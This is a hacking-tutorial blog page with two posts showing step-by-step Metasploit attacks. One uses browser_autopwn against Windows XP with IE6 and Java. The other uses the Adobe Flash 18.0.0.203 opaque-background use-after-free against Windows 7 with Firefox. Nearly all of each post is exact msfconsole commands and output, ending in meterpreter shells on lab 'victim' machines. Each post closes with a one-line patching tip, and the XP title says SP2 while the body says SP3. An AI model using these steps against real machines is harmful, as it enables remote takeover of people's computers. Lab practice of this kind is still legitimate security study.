metalkey

Hacking tutorials + info

Metasploit Browser Autopwn – Windows XP SP2

July 01, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows XP SP3 (Java 6u25, IE6)

Step 1 – Starting the Browser Autopwn Server

Run msfconsole, load the browser_autopwn module and set all required options.

root@kali:~$ msfconsole
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.1.12
msf auxiliary(browser_autopwn) > set SRVPORT 80
msf auxiliary(browser_autopwn) > set URIPATH /
msf auxiliary(browser_autopwn) > run

[*] Starting exploit modules on host 192.168.1.12...
[*] Server started.

The Browser Autopwn Server is now running and waiting for victims to browse to the url http://192.168.1.12

Step 2 – Pwning the Victim

On your Windows XP test machine (victim), browse to http://192.168.1.12.
This will trigger the browser_autopwn module to serve the appropriate exploit and launch a meterpreter session.

[*] Meterpreter session 1 opened (192.168.1.12:7777 ->
192.168.1.13:1045) at 2015-07-25 05:08:06 -0400
...
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...meterpreter > shell
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\IEUser\Desktop>echo %USERNAME%
Victim

C:\Documents and Settings\IEUser\Desktop>ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : Home
IP Address. . . . . . . . . . . . : 192.168.1.13
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

C:\Documents and Settings\IEUser\Desktop>

You now have shell access to the Windows XP SP3 Victim with the same access as the user who navigated to the exploit url.

Solution

Keep your software fully updated (e.g. Windows, Web Browsers, Java, etc…) and uninstall unused applications.

Tags: metasploit

Metasploit Adobe Flash 18.0.0.203 Exploit – Windows 7 / Windows 8.1

July 01, 2016 — metalkey
Attacker: Kali Linux
Victim: Windows 7 Enterprise 32-bit (Adobe Flashplayer 18.0.0.203, Firefox 39)

Step 1 – Starting the Exploit Server

Run msfconsole, load adobe-flash-opaque-background-uaf and set all required options.

root@kali:~$ msfconsole
msf > use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf exploit(adobe_flash_opaque_background_uaf) > set SRVPORT 80
msf exploit(adobe_flash_opaque_background_uaf) > set URIPATH /
msf exploit(adobe_flash_opaque_background_uaf) > exploit
[*] Local IP: http://192.168.1.12:80/
[*] Server started.

Step 2 – Exploiting the Victim Machine

On your Windows test machine (victim), start Firefox and browse to http://192.168.1.12.
This will trigger the adobe-flash-opaque-background-uaf exploit and launch a meterpreter session.

[*] 192.168.1.11 adobe_flash_opaque_background_uaf - Sending SWF...
[*] Sending stage (885806 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.11:49297) at 2015-08-01 04:39:34 -0400
msf exploit(adobe_flash_opaque_background_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: IE8Win7\IEUser
meterpreter > ls
Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2015-08-01 03:32:42 -0400 Program Files
40777/rwxrwxrwx 0 dir 2015-08-01 03:32:42 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:42 -0400 Recovery
40777/rwxrwxrwx 0 dir 2014-11-26 14:57:05 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2013-10-23 12:22:47 -0400 Users
40777/rwxrwxrwx 0 dir 2013-10-23 17:52:20 -0400 Wallpaper
40777/rwxrwxrwx 0 dir 2015-08-01 03:20:08 -0400 Windows
100777/rwxrwxrwx 24 fil 2009-06-10 17:42:20 -0400 autoexec.bat
100666/rw-rw-rw- 10 fil 2009-06-10 17:42:20 -0400 config.sys
100666/rw-rw-rw- 1073741824 fil 2015-08-01 04:01:24 -0400 pagefile.sys

Solution

Uninstall flashplayer.

Tags: metasploit